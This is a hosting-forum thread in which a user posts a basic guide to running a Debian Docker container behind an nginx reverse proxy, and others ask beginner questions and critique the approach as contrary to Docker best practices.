arrow_upward

Pages (2):
Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
How to create Docker's container and enter its shell [Basic container for any-usage]
#1
I didn't plan to post this guide because it wasn't intend to. But since @deanhills splitted the post... here we go Smile


So, on @Mashiro topic about setting up a WP from scratch I wrote a simple command-list to create a container... Why? I think that nowadays it is important to isolate any application because there could be any CVE that can hurt our precious VPS!

BEWARE: CONTAINERS ARE NOT A SECURITY TOOLS. YOU MUST SECURE YOURSELF CONFIGURING A STRONG PROTECTION AGAIN ATTACKS

So, why create a container?
Let's imagine that we were running a Laravel WebApplication and someone used the latest known CVE to inject on our machine a cryptominer know as kdevtmpfsi . The cryptominer is a cron-job script that check if the miner process is running, if not it will download the binaries and run it. If you kill it... it will just respawn.

To get rid of the cryptominer you must FIND the faulty cronjob and delete it. Then you can hope that by deleting the binaries it will not respawn. I got a personal experience with such miner and it was a pain. My friend application was running on barehardware and the miner got injected into the main system...

If the application were running inside a container the solution could be very fast: just destroy and recreate the container! I mean, we were still vulnerable but the recovery process was much faster, as I have already said: containers aren't security tools!

Now, for example we want to run WP from scratch but inside a container? How can do such a complex thinh? Don't worry... using a container is easy as using a normal terminal connection Smile

A basic way to create a basic container ready for any usage is:
Quote:docker run -it -d --name debian -p 9090:80 debian:latest
  • "docker run": creates a new container;
  • "-it": tags the container as a interactive one, you can access its shell;
  • "-d": tags the container as detachable, it will not block your terminal once started;
  • "--name debian": names the container for easy handling;
  • "-p 9090:80": it binds your host port to the port of the container, very useful if we want to host services that requires port... such as Web services!;
  • "debian:latest": points to the latest stable, Buster.
Once the containers is up you can access it in 2 ways:
  • Attach using 
    docker attach debian
  • Deattach using the combination: CTRL+P + CTRL+ Q
Or
  • Attach using 
    docker exec -it debian /usr/bin/bash
  • Deattach using the combination CTRL+C or the command exit


Now, inside the container shell you can just follow @Mashiro tutorial 1:1 with commands, there is no differences!

After everything is setup, you must create a reverse proxy that points to the container...
Because @Mashiro used NGINX I will provide below a simple reverse-proxy configuration for our example case:

server {
listen      80;
server_name your_prefered_domain
location /{
proxy_pass 0.0.0.0:9090
proxy_set_header Host              $host;
proxy_set_header X-Real-IP         $remote_addr;
proxy_set_header X-Forwarded-For   $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Forwarded-Host  $host;
proxy_set_header X-Forwarded-Port  $server_port;
}
This reverse proxy is very basic, for example it lack of HTTPS redirect... but that is not the goal of this tutorial Smile

I know that this container is not optimal, there is no persistent but it gives you a bit a "security" and doesn't require much of docker knowledge.
Thanks to Post4VPS and Bladenodefor VPS 14
#2
(05-23-2021, 11:58 AM)LightDestory Wrote: I will try to write a tutorial about reverse proxy as soon as I got some time.

I know that this container is not optimal, there is no persistent but it gives you a bit a "security" and doesn't require much of docker knowledge.
Hi @LightDestory  I've moved your tutorial about how to set up a WP Blog with Debian 10, Nginx, php 8.0 and MariaDB with a Docker Container to a new thread. Technically your above tutorial for using a Docker container instead of the command line - I'm sure this was not your intention - was hijacking Mashiro's tutorial.  So if you want to do a tutorial with Docker, it is better to create this under a separate heading like I've done for you now. If you want me to change the title of the tutorial, please let me know. 

As you know, Mashiro is a Docker specialist himself however did what he did for helping me when I asked for help with a tutorial from the command line.  I was unable to find any tutorials that worked for me on the Web - so Mashiro showed how it could be done (step by step with no steps missed), which was almost like rising to the challenge - which I greatly appreciated. 

I've been watching Docker from a distance and I'm sure there are others like me who are very interested in a tutorial that shows us step by step (with no steps missed) how to set up a container with an instance of Debian 10, Nginx, PHP 8.0 and MariaDB in it and how to run WordPress on it.  If you have time to do a detailed step by step tutorial (with no steps missed) like Mashiro did in the tutorial from the command line it will be greatly appreciated.  You can do it in this thread. Big Grin

To be honest, the above tutorial by you is not detailed enough for a beginner.  I'd like to see introductory steps of where you get Docker from.  How do you create the container (step by step). How does the container work?  Do you start it on a fresh install of an OS, or can you install it on a current install.  What steps do you follow to load Debian, Nginx, etc in the container and how do you create the WP Blog in the container.  Then how do you publish the blog.  Your tutorial may be good for other Docker geeks, but for me I wouldn't know where to start to add Debian and all the other software to the container, and then how one gets the final product to show on the Web.  I get it that Docker is a snapshot of something (in a container), but I can't get how it works vs how it works from the command line.  I can't visualize it. I'd need a step by step (with no steps missed) tutorial to be able to do it, and also to understand what I am doing.
Terminal
Thank you to Post4VPS and VirMach for my awesome VPS 9!  
#3
To echo @deanhills, I'd honestly love to see a tutorial on Docker, I tried taking a few YouTube courses on it and honestly could not figure out how to set up my docker file.
Thank you to CubeData and Posts4VPS for the services of VPS 8.
#4
I am going to edit the post to properly set a topic.

The aim of my istrunction were just to create a containers ready to be used for cli-installations Smile
Thanks to Post4VPS and Bladenodefor VPS 14
#5
Thanks VERY much for the tutorial @LightDestory.  So for someone who hasn't worked with Docker before (apologies in advance if the questions are too basic).  I have some questions to ask from an experienced user:

1. Is it possible to dockerize/containerize an existing application?  I.e. can I create docker on a system that already has an application running with Debian, and then somehow move the application into a container?  Or is it better to start the container from scratch with a freshly installed OS?

2. Can one have docker with containers PLUS other applications from the command line, or does one have to install docker from scratch on a fresh installation of an OS and then following that all applications need to be run in separate containers.  

3. How safe and secure is Docker itself?  I get a feeling of it being a panel of sorts where containers are attached and detached.

4. What is the difference between a container and backup?  I get it that a container is a shell of sorts in which the software associated with the application has been captured as well, so when you transport the container the software doesn't need to be reinstalled again.  But for me it has the same feel as a backup plugin of WordPress, except Docker container is possibly more secure.
Terminal
Thank you to Post4VPS and VirMach for my awesome VPS 9!  
#6
(05-27-2021, 07:02 PM)deanhills Wrote: Thanks VERY much for the tutorial @LightDestory.  So for someone who hasn't worked with Docker before (apologies in advance if the questions are too basic).  I have some questions to ask from an experienced user:

1. Is it possible to dockerize/containerize an existing application?  I.e. can I create docker on a system that already has an application running with Debian, and then somehow move the application into a container?  Or is it better to start the container from scratch with a freshly installed OS?

2. Can one have docker with containers PLUS other applications from the command line, or does one have to install docker from scratch on a fresh installation of an OS and then following that all applications need to be run in separate containers.  

3. How safe and secure is Docker itself?  I get a feeling of it being a panel of sorts where containers are attached and detached.

4. What is the difference between a container and backup?  I get it that a container is a shell of sorts in which the software associated with the application has been captured as well, so when you transport the container the software doesn't need to be reinstalled again.  But for me it has the same feel as a backup plugin of WordPress, except Docker container is possibly more secure.

  1. Docker can be installed anytime, no need to have a freshly installed OS. Regarding your question about the application move... well... it works that way. If someone has an application running on the bare hardware you simply decide to move it inside docker. This transition can be easy or complex because it depends on the applicaiton you are talking about. But Docker can containerize almost anything, you just need to study the "Dockerfile" specification and if you want to set up stacks (MYSQL-NGINX-PHP-WP, for example) you can use "docker-compose" that let's you create everything with just a "docker-compose up" command and a provided docker-compose-yml file!
    On this tutorial I didn't use any dockerfile because it was related to @Mashiro advice to do it from scratch to learn the components behind WP.
  2. Docker is just an applicaition that runs other applicaiton. It is not a OS or other low-level tool. You can have docker and other application and they can co-exists. If you want to create a inter-connection between the application (containerized or host-installed) you can set up a virtual network on which docker can communicate. For example you can have WP and MYSQL on different containers but they can communicate, if WP goes down... your MYSQL is untouched and you only need to re-create WP. 
    On this tutorial I said that the container was not optimal because we were abusing of it. Installing every component of application-stack such as WP on the same container is not a good practice... but create different containers and make them communicate is not a 0-knowledge thing.
  3. Docker is safe, it will not hurt your system anyway. When you start a containers is like running an application on background. If you want to interact with it you need to enter itìs shell or manage it via a WEB PANEL, such as Portainerio. 
    I used the -d parameter because without it that command would "block" your terminal because the container will take the control of it. If you close that terminal the container will shutdown... we don't want it... do with -d we say: "you must stay running on background, when I need you I will perform an attach".
  4. A container is not a backup... it is an application running inside a sandbox.. it means it can't see other than itself. It can't damage your system hosting system. For example on a Debian VPS you can run a CentOS container and you will see a total RPM-based system... centos is likely to unkown it is a container. Generaly you don't copy and paste a container, you use a Dockerfile to create a new instance of that application (container).  

I tried to be more friendly possible, I didn't talk about namespaces, cgroups and so on because it is a more technically concept. @Mashiro, if you can explain it more easily you are welcome.
Thanks to Post4VPS and Bladenodefor VPS 14
#7
I'll do a couple of posts in this thread. The first would be a quick review of the OP highlighting the main issues I had reading it. The second will address @deanhills' questions and @LightDestory's answers to them. May be later on, I'll open a more comprehensive thread on Linux containers and where Docker containers rank among them.

Here I won't go back to my previous principled objection (done elsewhere on this board) of using Docker inside a KVM VPS and just go along the assumption that the resources are good enough to get everything run smoothly.

Okay, now, for the OP's review. I understand that it wasn't planned to be a stand-alone topic from its intro. but still the whole OP fails on so many points that I can't just let it pass un-annotated--at least not under my watch :-)

1- The Why Docker Container Part:
(05-23-2021, 11:58 AM)LightDestory Wrote: So, on @Mashiro topic about setting up a WP from scratch I wrote a simple command-list to create a container... Why? I think that nowadays it is important to isolate any application because there could be any CVE that can hurt our precious VPS!

BEWARE: CONTAINERS ARE NOT A SECURITY TOOLS. YOU MUST SECURE YOURSELF CONFIGURING A STRONG PROTECTION AGAIN ATTACKS

So, why create a container?
Let's imagine that we were running a Laravel WebApplication and someone used the latest known CVE to inject on our machine a cryptominer know as kdevtmpfsi . The cryptominer is a cron-job script that check if the miner process is running, if not it will download the binaries and run it. If you kill it... it will just respawn.

To get rid of the cryptominer you must FIND the faulty cronjob and delete it. Then you can hope that by deleting the binaries it will not respawn. I got a personal experience with such miner and it was a pain. My friend application was running on barehardware and the miner got injected into the main system...

If the application were running inside a container the solution could be very fast: just destroy and recreate the container! I mean, we were still vulnerable but the recovery process was much faster, as I have already said: containers aren't security tools!

From the above we deduce that the main incentive in using Docker containers here is the isolated, ephemeral and statelessness of the Docker container that makes it disposable, i.e. just throw the container away and spin up another one.

Nothing wrong there, in fact, it's perfectly what Docker containers are designed for:
> Docker containers are "ephemeral, stateless, minimal containers that won’t typically get upgraded or re-configured but instead just be replaced entirely.

Although I did sense a bit of confusion in this part of the last paragraph:
(05-23-2021, 11:58 AM)LightDestory Wrote: If the application were running inside a container the solution could be very fast: just destroy and recreate the container! I mean, we were still vulnerable but the recovery process was much faster, as I have already said: containers aren't security tools!

It might be due to a lack of a clear view of what a container is really all about?!.. A container can be mentally viewed as a process tree running inside its own namespace (hence the isolated environment); the malware resides(/confined) somewhere in that process tree. Once the container is destroyed, ie the process tree killed, the malware is killed too from within.. That simple!

2- The Docker Container Creation Part:
(05-23-2021, 11:58 AM)LightDestory Wrote: Now, for example we want to run WP from scratch but inside a container? How can do such a complex thinh? Don't worry... using a container is easy as using a normal terminal connection :)

A basic way to create a basic container ready for any usage is:
docker run -it -d --name debian -p 9090:80 debian:latest
(.................)

Now, inside the container shell you can just follow @Mashiro tutorial 1:1 with commands, there is no differences!

Unfortunately this part is all wrong!.. And I don't recommend using it at all!.. Nothing in it makes sense as far as Docker container best practices go.

The example above download a Docker Debian-latest image and runs it on the fly in interactive mode to gain access to the shell from which it ask you to follow @Mashiro's tutorial!!..

Well, GoodBye the minimal container part that the Docker container definition is based on.

Even more, goodbye the ephemeral and stateless argument that the whole OP is based on (re-read section 1 about the CVE stuff and spinning up containers at will.) If each time we want to recreate our container after a malware infection we have to go through the whole @Mashiro's tutorial again!!!.. I would say that we didn't gain anything in this process, we just added the extra Docker part to the @Mashiro's already lenghty tutorial!..

Remember, we've said that:
> Docker containers are "ephemeral, stateless, minimal containers that won’t typically get upgraded or re-configured but instead just be replaced entirely.

So, what's the solution?.. If we really want to do what the OP suggested, then we need to use a system container (like LX D/LXC containers) not an application container like Docker containers.

But if we still want to stick with Docker, then we need to create 2 Docker images: one for a database, ie MySQL/MariaDB, and one for the Nginx/PHP+WP  or Apache/PHP+WP.

Both type of images are already available online but I will advice people to create their own Docker images by familiarizing themselves with Dockerfiles (pretty easy to pick up on.)

That should be all till Post_2.
VirMach's Buffalo_VPS-9 Holder (Dec. 20 - July 21)
microLXC's Container Holder (july 20 - ?)
VirMach's Phoenix_VPS-9 Holder (Apr. 20 - June 20)
NanoKVM's NAT-VPS Holder (jan. 20 - ?)
#8
(06-04-2021, 07:13 AM)fChk Wrote: I'll do a couple of posts in this thread. The first would be a quick review of the OP highlighting the main issues I had reading it. The second will address @deanhills' questions and @LightDestory's answers to them. May be later on, I'll open a more comprehensive thread on Linux containers and where Docker containers rank among them.

Here I won't go back to my previous principled objection (done elsewhere on this board) of using Docker inside a KVM VPS and just go along the assumption that the resources are good enough to get everything run smoothly.

Okay, now, for the OP's review. I understand that it wasn't planned to be a stand-alone topic from its intro. but still the whole OP fails on so many points that I can't just let it pass un-annotated--at least not under my watch :-)

1- The Why Docker Container Part:

From the above we deduce that the main incentive in using Docker containers here is the isolated, ephemeral and statelessness of the Docker container that makes it disposable, i.e. just throw the container away and spin up another one.

Nothing wrong there, in fact, it's perfectly what Docker containers are designed for:
> Docker containers are "ephemeral, stateless, minimal containers that won’t typically get upgraded or re-configured but instead just be replaced entirely.

Although I did sense a bit of confusion in this part of the last paragraph.

It might be due to a lack of a clear view of what a container is really all about?!.. A container can be mentally viewed as a process tree running inside its own namespace (hence the isolated environment); the malware resides(/confined) somewhere in that process tree. Once the container is destroyed, ie the process tree killed, the malware is killed too from within.. That simple!

2- The Docker Container Creation Part:

Unfortunately this part is all wrong!.. And I don't recommend using it at all!.. Nothing in it makes sense as far as Docker container best practices go.

The example above download a Docker Debian-latest image and runs it on the fly in interactive mode to gain access to the shell from which it ask you to follow @Mashiro's tutorial!!..

Well, GoodBye the minimal container part that the Docker container definition is based on.

Even more, goodbye the ephemeral and stateless argument that the whole OP is based on (re-read section 1 about the CVE stuff and spinning up containers at will.) If each time we want to recreate our container after a malware infection we have to go through the whole @Mashiro's tutorial again!!!.. I would say that we didn't gain anything in this process, we just added the extra Docker part to the @Mashiro's already lenghty tutorial!..

Remember, we've said that:
> Docker containers are "ephemeral, stateless, minimal containers that won’t typically get upgraded or re-configured but instead just be replaced entirely.

So, what's the solution?.. If we really want to do what the OP suggested, then we need to use a system container (like LX D/LXC containers) not an application container like Docker containers.

But if we still want to stick with Docker, then we need to create 2 Docker images: one for a database, ie MySQL/MariaDB, and one for the Nginx/PHP+WP  or Apache/PHP+WP.

Both type of images are already available online but I will advice people to create their own Docker images by familiarizing themselves with Dockerfiles (pretty easy to pick up on.)

That should be all till Post_2.

Thanks for your time replying this post, but please read Mashiro's post too to understand the nature of this topic.

As you said it was a un-scheduled tutorial, I didn't prepare any good material for it. 

I know, and already said on the OP, that this configuration was not optimal.
Quote:On this tutorial I said that the container was not optimal because we were abusing of it. Installing every component of application-stack such as WP on the same container is not a good practice... but create different containers and make them communicate is not a 0-knowledge thing.

When I mentioned Docker on Mashiro post, I have been replied that using Docker was a no-learning process because it was a nice excercise to set up from scratch the entire STACK applications. So.. I edited this tutorial for that in my mind: allowing the user to perform that guide inside a container.

It is not a good practice to abuse of the container like that but if you destroy the container you delete the volatile-volume linked to that containers and so you will delete both your data and the miner binary. I wanted to set up a "data" volume but it was out-of-level of a new user. Moreover, I didn't suggest the mount fs to volume option because it is dangerous if the miner binary or scripts get on your vps.

Do you except a someone new to Docker, as @deanhills, to master the concepts of persistents volumes, internal networking and container composition with docker-compose on a simple forum's post? There skills need time to master and a lot of try-and-error to get the confidance to get them work without any issue. Copy-paste a configuration from github will make it works but you will have 0 knowledge on how it is working. If you somedays want to build something different, such as a data pipeline where a LOT of software need to communicate, you will need the knowledge!

If I wanted to do a complete tutorial of WP+Mysql on Docker I would not do much on writing it. Because github is FULL of composition for this stack, moreover Mashiro has already wrote about portainerio and it has a stack template for WP. I would suggest use Portainer and learn how it configures that stack, it creates a internal networks and has good healtycheck for the containers.
Thanks to Post4VPS and Bladenodefor VPS 14
#9
(06-07-2021, 04:51 PM)LightDestory Wrote: Thanks for your time replying this post, but please read Mashiro's post too to understand the nature of this topic.

[quote="LightDestory"
[...]

Do you except a someone new to Docker, as @deanhills, to master the concepts of persistents volumes, internal networking and container composition with docker-compose on a simple forum's post? There skills need time to master and a lot of try-and-error to get the confidance to get them work without any issue. Copy-paste a configuration from github will make it works but you will have 0 knowledge on how it is working. If you somedays want to build something different, such as a data pipeline where a LOT of software need to communicate, you will need the knowledge!

If I wanted to do a complete tutorial of WP+Mysql on Docker I would not do much on writing it. Because github is FULL of composition for this stack, moreover Mashiro has already wrote about portainerio and it has a stack template for WP. I would suggest use Portainer and learn how it configures that stack, it creates a internal networks and has good healtycheck for the containers.

@LightDestory I totally agree with your points.  I also appreciate @fChk's contribution in that he highlighted the security issues with the simple container version.  My understanding from what he contributed is that if you want to do Docker as it is intended to be used, a VPS is probably not the right vehicle for it.  Possibly it's OK with our large spec VPSs like VPS 9.  But for smaller VPSs one would save a lot of resources and also it would be more secure to work from the command line, rather than install containers from the Docker repository.
Terminal
Thank you to Post4VPS and VirMach for my awesome VPS 9!  
#10
(06-07-2021, 04:51 PM)LightDestory Wrote: When I mentioned Docker on Mashiro post, I have been replied that using Docker was a no-learning process because it was a nice excercise to set up from scratch the entire STACK applications. So.. I edited this tutorial for that in my mind: allowing the user to perform that guide inside a container.
I disagree!.. There are plenty of basic (and not-so-basic) knowledge worthy to spread while writing(/teaching) about Docker Container technology!.. It just needs you to have enough background on the subject with hands-on experience, while avoiding too much jargon that distract readers, automating tools that obfuscate the subject and unnecessary topics at this level like composition, scheduling and orchestration etc.. The rest is doable even for newbies.

(06-07-2021, 04:51 PM)LightDestory Wrote: When I mentioned Docker on Mashiro post, I have been replied that using Docker was a no-learning process because it was a nice excercise to set up from scratch the entire STACK applications. So.. I edited this tutorial for that in my mind: allowing the user to perform that guide inside a container.
I think I'm aware of the circumstances in which this tutorial came into being but in any case the result (ie the OP) did a lot of injustice to the whole notion of Docker containers given the hasty way in which it was written.

You see, to my mind, the OP's only real use-case was as a tip to a developer sitting in front of his/here laptop testing @Mashiro's tutorial inside a container then destroy it when everything checks OK!.. Thus it's a way for developers to:
> avoid messing up their own system (if they are using Debian 10) or
> avoid using a full-fledged KVM VM to do that testing instead.

If that's your intention from this tutorial then you should write it in the introduction of the OP for everybody to read and be aware of to avoid having the wrong idea about how Docker containers are run in production.

A better -more didactical- way is to first introduce Docker; what it is? what's for? and then and only then how it's used?
VirMach's Buffalo_VPS-9 Holder (Dec. 20 - July 21)
microLXC's Container Holder (july 20 - ?)
VirMach's Phoenix_VPS-9 Holder (Apr. 20 - June 20)
NanoKVM's NAT-VPS Holder (jan. 20 - ?)
Pages (2):



person_pin_circle Users browsing this thread: 1 Guest(s)
Sponsors: VirMach - Host4Fun - CubeData - Evolution-Host - HostDare - Hyper Expert - Shadow Hosting - Bladenode - Hostlease - RackNerd - ReadyDedis - Limitless Hosting